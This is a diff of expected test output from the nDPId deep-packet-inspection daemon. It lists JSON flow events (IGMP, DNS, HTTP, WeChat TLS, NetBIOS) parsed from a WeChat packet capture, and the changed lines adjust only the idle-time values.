00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171267294,"flow_last_seen":1492171269750,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7560000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7560000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171268754,"flow_last_seen":1492171273759,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -655,24 +655,24 @@ 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171268427,"flow_last_seen":1492171273433,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 